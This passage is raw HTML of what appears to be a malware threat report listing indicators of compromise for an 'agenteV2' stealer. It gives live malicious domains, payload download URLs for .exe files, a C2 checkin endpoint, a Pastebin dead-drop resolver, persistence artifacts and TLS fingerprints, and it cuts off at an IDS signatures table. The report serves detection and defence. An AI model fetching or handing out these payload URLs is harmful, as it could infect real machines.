data-cell-id=\"C6\"\n                    data-col-index=\"2\"\n                    data-row-index=\"5\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tMalicious                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"D6\"\n                    data-col-index=\"3\"\n                    data-row-index=\"5\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tC2\t\t\tserver hostname                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"A7\"\n                    data-col-index=\"0\"\n                    data-row-index=\"6\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\t172.66.171.73                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"B7\"\n                    data-col-index=\"1\"\n                    data-row-index=\"6\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tIP                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"C7\"\n                    data-col-index=\"2\"\n                    data-row-index=\"6\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tSuspicious                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"D7\"\n                    data-col-index=\"3\"\n                    data-row-index=\"6\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tCloudflare\t\t\tproxy for Pastebin not directly malicious                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"A8\"\n                    data-col-index=\"0\"\n                    data-row-index=\"7\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tpastebin.com\/raw\/0RmxqY57                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"B8\"\n                    data-col-index=\"1\"\n                    data-row-index=\"7\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tURL                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"C8\"\n                    data-col-index=\"2\"\n                    data-row-index=\"7\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tMalicious                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"D8\"\n                    data-col-index=\"3\"\n                    data-row-index=\"7\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tDead-drop\t\t\tresolver contains plaintext C2 IP:port                    <\/td>\n                                        <\/tr>\n                    <\/table>\n<\/div><style id='wpdt-custom-style-306'>\ntable#wpdtSimpleTable-306{ table-layout: fixed !important; }\ntable#wpdtSimpleTable-306 td, table.wpdtSimpleTable306 th { white-space: normal !important; }\n.wpdt-bc-03A9F4 { background-color: #03A9F4 !important;}\n.wpdt-fs-000014 { font-size: 14px !important;}\n.wpdt-fs-000012 { font-size: 12px !important;}\n<\/style>\n\n\n\n\n<h3 class=\"wp-block-heading\"><br>Malicious URLs<\/h3>\n\n\n\n<div class=\"wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper\n\"\n    >\n        <table id=\"wpdtSimpleTable-307\"\n           style=\"border-collapse:collapse;\n                   border-spacing:0px;\"\n           class=\"wpdtSimpleTable wpDataTable\"\n           data-column=\"2\"\n           data-rows=\"12\"\n           data-wpID=\"307\"\n           data-responsive=\"0\"\n           data-has-header=\"1\">\n\n                    <thead>        <tr class=\"wpdt-cell-row \" >\n                                <th class=\"wpdt-cell wpdt-bold wpdt-bc-03A9F4 wpdt-fs-000014\"\n                                            data-cell-id=\"A1\"\n                    data-col-index=\"0\"\n                    data-row-index=\"0\"\n                    style=\" width:63.486842105263%;                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tURL                    <\/th>\n                                                <th class=\"wpdt-cell wpdt-bold wpdt-bc-03A9F4 wpdt-fs-000014\"\n                                            data-cell-id=\"B1\"\n                    data-col-index=\"1\"\n                    data-row-index=\"0\"\n                    style=\" width:36.513157894737%;                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tFunction                    <\/th>\n                                        <\/tr>\n                    <tbody>        <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"A2\"\n                    data-col-index=\"0\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\thttps:\/\/odaracani.online\/index.php?id=3df947b3                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"B2\"\n                    data-col-index=\"1\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tGate\t\t\tunique per-victim tracking ID                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"A3\"\n                    data-col-index=\"0\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\thttps:\/\/nuevaprodeciencia.club\/cert.php                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"B3\"\n                    data-col-index=\"1\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tRedirect\t\t\tchain step 1                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"A4\"\n                    data-col-index=\"0\"\n                    data-row-index=\"3\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\thttps:\/\/nuevaprodeciencia.club\/cord.php                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"B4\"\n                    data-col-index=\"1\"\n                    data-row-index=\"3\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tRedirect\t\t\tchain step 2                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"A5\"\n                    data-col-index=\"0\"\n                    data-row-index=\"4\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\thttps:\/\/nuevaprodeciencia.club\/br77b\/download.php                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"B5\"\n                    data-col-index=\"1\"\n                    data-row-index=\"4\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tRedirect\t\t\tto payload landing                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"A6\"\n                    data-col-index=\"0\"\n                    data-row-index=\"5\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\thttps:\/\/nuevaprodeciencia.club\/br77b\/arquivos\/download.php?id_69bb7d47c15e9                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"B6\"\n                    data-col-index=\"1\"\n                    data-row-index=\"5\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tPayload\t\t\tlanding page                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"A7\"\n                    data-col-index=\"0\"\n                    data-row-index=\"6\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\thttps:\/\/nuevaprodeciencia.club\/br77b\/arquivos\/download\/base.php?LpHQPCBwX=766760                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"B7\"\n                    data-col-index=\"1\"\n                    data-row-index=\"6\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tConfiguration\t\t\t\/ stage data                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"A8\"\n                    data-col-index=\"0\"\n                    data-row-index=\"7\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\thttps:\/\/nuevaprodeciencia.club\/br77b\/arquivos\/download\/reiniciar.exe                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"B8\"\n                    data-col-index=\"1\"\n                    data-row-index=\"7\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tPayload:\t\t\treiniciar.exe (~6.4 MB)                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"A9\"\n                    data-col-index=\"0\"\n                    data-row-index=\"8\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\thttps:\/\/nuevaprodeciencia.club\/br77b\/arquivos\/download\/msedge03.exe                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"B9\"\n                    data-col-index=\"1\"\n                    data-row-index=\"8\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tPayload:\t\t\tmsedge03.exe                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"A10\"\n                    data-col-index=\"0\"\n                    data-row-index=\"9\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\thttps:\/\/nuevaprodeciencia.club\/br77b\/arquivos\/download\/msedge04.exe                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"B10\"\n                    data-col-index=\"1\"\n                    data-row-index=\"9\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tPayload:\t\t\twifi_driver.exe (served as msedge04.exe)                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"A11\"\n                    data-col-index=\"0\"\n                    data-row-index=\"10\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\thttps:\/\/nuevaprodeciencia.club\/br77b\/iayjaskyeiagds.php                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"B11\"\n                    data-col-index=\"1\"\n                    data-row-index=\"10\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tC2\t\t\tinitial checkin endpoint (called by VBS loader)                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"A12\"\n                    data-col-index=\"0\"\n                    data-row-index=\"11\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\thttps:\/\/pastebin.com\/raw\/0RmxqY57                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"B12\"\n                    data-col-index=\"1\"\n                    data-row-index=\"11\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tDead-drop\t\t\tresolver C2 IP:port                    <\/td>\n                                        <\/tr>\n                    <\/table>\n<\/div><style id='wpdt-custom-style-307'>\ntable#wpdtSimpleTable-307{ table-layout: fixed !important; }\ntable#wpdtSimpleTable-307 td, table.wpdtSimpleTable307 th { white-space: normal !important; }\n.wpdt-bc-03A9F4 { background-color: #03A9F4 !important;}\n.wpdt-fs-000014 { font-size: 14px !important;}\n.wpdt-fs-000012 { font-size: 12px !important;}\n<\/style>\n\n\n\n\n<h3 class=\"wp-block-heading\"><br>Host-Based IOCs<\/h3>\n\n\n\n<div class=\"wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper\n\"\n    >\n        <table id=\"wpdtSimpleTable-308\"\n           style=\"border-collapse:collapse;\n                   border-spacing:0px;\"\n           class=\"wpdtSimpleTable wpDataTable\"\n           data-column=\"3\"\n           data-rows=\"10\"\n           data-wpID=\"308\"\n           data-responsive=\"0\"\n           data-has-header=\"1\">\n\n                    <thead>        <tr class=\"wpdt-cell-row \" >\n                                <th class=\"wpdt-cell wpdt-fs-000014 wpdt-bc-03A9F4 wpdt-bold\"\n                                            data-cell-id=\"A1\"\n                    data-col-index=\"0\"\n                    data-row-index=\"0\"\n                    style=\" width:10.787486515642%;                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tArtifact                    <\/th>\n                                                <th class=\"wpdt-cell wpdt-fs-000014 wpdt-bc-03A9F4 wpdt-bold\"\n                                            data-cell-id=\"B1\"\n                    data-col-index=\"1\"\n                    data-row-index=\"0\"\n                    style=\" width:49.838187702265%;                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tPath\t\t\t\/ Value                    <\/th>\n                                                <th class=\"wpdt-cell wpdt-fs-000014 wpdt-bc-03A9F4 wpdt-bold\"\n                                            data-cell-id=\"C1\"\n                    data-col-index=\"2\"\n                    data-row-index=\"0\"\n                    style=\" width:39.374325782093%;                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tNotes                    <\/th>\n                                        <\/tr>\n                    <tbody>        <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"A2\"\n                    data-col-index=\"0\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tVBS\t\t\tLoader (delivered)                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"B2\"\n                    data-col-index=\"1\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tC:\\Users\\*\\Downloads\\0124_INTMACAO_.vbs                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"C2\"\n                    data-col-index=\"2\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\t16,739\t\t\tbytes obfuscated                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"A3\"\n                    data-col-index=\"0\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tVBS\t\t\tLoader (decoded)                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"B3\"\n                    data-col-index=\"1\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tC:\\Users\\*\\AppData\\Local\\Temp\\0124_INTMACAO_.vbs                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"C3\"\n                    data-col-index=\"2\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\t140,302\t\t\tbytes runtime-expanded                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"A4\"\n                    data-col-index=\"0\"\n                    data-row-index=\"3\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tContainer\t\t\tbinary                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"B4\"\n                    data-col-index=\"1\"\n                    data-row-index=\"3\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tC:\\Program\t\t\tFiles (x86)\\Wi-fi\\wifi_driver.exe                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"C4\"\n                    data-col-index=\"2\"\n                    data-row-index=\"3\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\t13,177,856\t\t\tbytes onefile bundle                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"A5\"\n                    data-col-index=\"0\"\n                    data-row-index=\"4\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tSecondary\t\t\tcontainer                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"B5\"\n                    data-col-index=\"1\"\n                    data-row-index=\"4\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tC:\\Program\t\t\tFiles (x86)\\Wi-fi\\reiniciar.exe                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"C5\"\n                    data-col-index=\"2\"\n                    data-row-index=\"4\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\t6,685,696\t\t\tbytes secondary onefile bundle                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"A6\"\n                    data-col-index=\"0\"\n                    data-row-index=\"5\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tCore\t\t\tstealer DLL                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"B6\"\n                    data-col-index=\"1\"\n                    data-row-index=\"5\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tC:\\Users\\*\\AppData\\Local\\Temp\\onefile_*\\agenteV2_historico_detect.dll                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"C6\"\n                    data-col-index=\"2\"\n                    data-row-index=\"5\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\t27\t\t\tMB MD5: 826d6350724f203b911aa6c8c4626391                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"A7\"\n                    data-col-index=\"0\"\n                    data-row-index=\"6\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tScheduled\t\t\tTask                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"B7\"\n                    data-col-index=\"1\"\n                    data-row-index=\"6\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tRunAsAdmin_AutoUpdate                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"C7\"\n                    data-col-index=\"2\"\n                    data-row-index=\"6\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tExecutes\t\t\twifi_driver.exe at logon, \/rl highest                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"A8\"\n                    data-col-index=\"0\"\n                    data-row-index=\"7\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tScheduled\t\t\tTask                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"B8\"\n                    data-col-index=\"1\"\n                    data-row-index=\"7\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tRunAsAdmin_Executar                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"C8\"\n                    data-col-index=\"2\"\n                    data-row-index=\"7\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tExecutes\t\t\treiniciar.exe at logon, \/rl highest                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"A9\"\n                    data-col-index=\"0\"\n                    data-row-index=\"8\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tRegistry\t\t\tRun                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"B9\"\n                    data-col-index=\"1\"\n                    data-row-index=\"8\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tHKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\MonitorSystem                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"C9\"\n                    data-col-index=\"2\"\n                    data-row-index=\"8\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tValue:\t\t\t...\\ONEFIL~1\\agenteV2_historico_detect.py                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"A10\"\n                    data-col-index=\"0\"\n                    data-row-index=\"9\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tInstall\t\t\tdirectory                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"B10\"\n                    data-col-index=\"1\"\n                    data-row-index=\"9\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tC:\\Program\t\t\tFiles (x86)\\Wi-fi\\                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"C10\"\n                    data-col-index=\"2\"\n                    data-row-index=\"9\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tCreated\t\t\tby malware masquerades as Wi-Fi driver folder                    <\/td>\n                                        <\/tr>\n                    <\/table>\n<\/div><style id='wpdt-custom-style-308'>\ntable#wpdtSimpleTable-308{ table-layout: fixed !important; }\ntable#wpdtSimpleTable-308 td, table.wpdtSimpleTable308 th { white-space: normal !important; }\n.wpdt-fs-000014 { font-size: 14px !important;}\n.wpdt-bc-03A9F4 { background-color: #03A9F4 !important;}\n.wpdt-fs-000012 { font-size: 12px !important;}\n<\/style>\n\n\n\n\n<h3 class=\"wp-block-heading\"><br>TLS \/ Network Fingerprints<\/h3>\n\n\n\n<div class=\"wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper\n\"\n    >\n        <table id=\"wpdtSimpleTable-309\"\n           style=\"border-collapse:collapse;\n                   border-spacing:0px;\"\n           class=\"wpdtSimpleTable wpDataTable\"\n           data-column=\"3\"\n           data-rows=\"4\"\n           data-wpID=\"309\"\n           data-responsive=\"0\"\n           data-has-header=\"1\">\n\n                    <thead>        <tr class=\"wpdt-cell-row \" >\n                                <th class=\"wpdt-cell wpdt-bold wpdt-bc-03A9F4 wpdt-fs-000014\"\n                                            data-cell-id=\"A1\"\n                    data-col-index=\"0\"\n                    data-row-index=\"0\"\n                    style=\" width:9.4428706326723%;                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tType                    <\/th>\n                                                <th class=\"wpdt-cell wpdt-bold wpdt-bc-03A9F4 wpdt-fs-000014\"\n                                            data-cell-id=\"B1\"\n                    data-col-index=\"1\"\n                    data-row-index=\"0\"\n                    style=\" width:50.047214353163%;                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tValue                    <\/th>\n                                                <th class=\"wpdt-cell wpdt-bold wpdt-bc-03A9F4 wpdt-fs-000014\"\n                                            data-cell-id=\"C1\"\n                    data-col-index=\"2\"\n                    data-row-index=\"0\"\n                    style=\" width:40.509915014164%;                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tUse                    <\/th>\n                                        <\/tr>\n                    <tbody>        <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"A2\"\n                    data-col-index=\"0\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tJA3                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"B2\"\n                    data-col-index=\"1\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\ta48c0d5f95b1ef98f560f324fd275da1                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"C2\"\n                    data-col-index=\"2\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tClient\t\t\tTLS fingerprint detect agenteV2 regardless of C2 IP rotation                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"A3\"\n                    data-col-index=\"0\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tJA3S                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"B3\"\n                    data-col-index=\"1\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\t15af977ce25de452b96affa2addb1036                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"C3\"\n                    data-col-index=\"2\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tServer\t\t\tTLS response fingerprint                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"A4\"\n                    data-col-index=\"0\"\n                    data-row-index=\"3\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tJARM                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"B4\"\n                    data-col-index=\"1\"\n                    data-row-index=\"3\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\t00000000000000000000000000000000000000000000000000000000000000                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"C4\"\n                    data-col-index=\"2\"\n                    data-row-index=\"3\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tCloudflare\t\t\t(Pastebin) not C2 fingerprint                    <\/td>\n                                        <\/tr>\n                    <\/table>\n<\/div><style id='wpdt-custom-style-309'>\ntable#wpdtSimpleTable-309{ table-layout: fixed !important; }\ntable#wpdtSimpleTable-309 td, table.wpdtSimpleTable309 th { white-space: normal !important; }\n.wpdt-bc-03A9F4 { background-color: #03A9F4 !important;}\n.wpdt-fs-000014 { font-size: 14px !important;}\n.wpdt-fs-000012 { font-size: 12px !important;}\n<\/style>\n\n\n\n\n<h3 class=\"wp-block-heading\"><br>IDS\/IPS Signatures (Observed Suricata Alerts)<\/h3>\n\n\n\n<div class=\"wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper\n\"\n    >\n        <table id=\"wpdtSimpleTable-310\"\n           style=\"border-collapse:collapse;\n                   border-spacing:0px;\"\n           class=\"wpdtSimpleTable wpDataTable\"\n           data-column=\"3\"\n           data-rows=\"7\"\n           data-wpID=\"310\"\n           data-responsive=\"0\"\n           data-has-header=\"1\">\n\n                    <thead>        <tr class=\"wpdt-cell-row \" >\n                                <th class=\"wpdt-cell wpdt-bold wpdt-bc-03A9F4 wpdt-fs-000014\"\n                                            data-cell-id=\"A1\"\n                    data-col-index=\"0\"\n                    data-row-index=\"0\"\n                    style=\" width:10.209102091021%;                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tSID                    <\/th>\n                                                <th class=\"wpdt-cell wpdt-bold wpdt-bc-03A9F4 wpdt-fs-000014\"\n                                            data-cell-id=\"B1\"\n                    data-col-index=\"1\"\n                    data-row-index=\"0\"\n                    style=\" width:53.751537515375%;                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tMessage                    <\/th>\n                                                <th class=\"wpdt-cell wpdt-bold wpdt-bc-03A9F4 wpdt-fs-000014\"\n                                            data-cell-id=\"C1\"\n                    data-col-index=\"2\"\n                    data-row-index=\"0\"\n                    style=\" width:36.039360393604%;                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tMeaning                    <\/th>\n                                        <\/tr>\n                    <tbody>        <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"A2\"\n                    data-col-index=\"0\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\t2022658                    <\/td>\n                                                <td 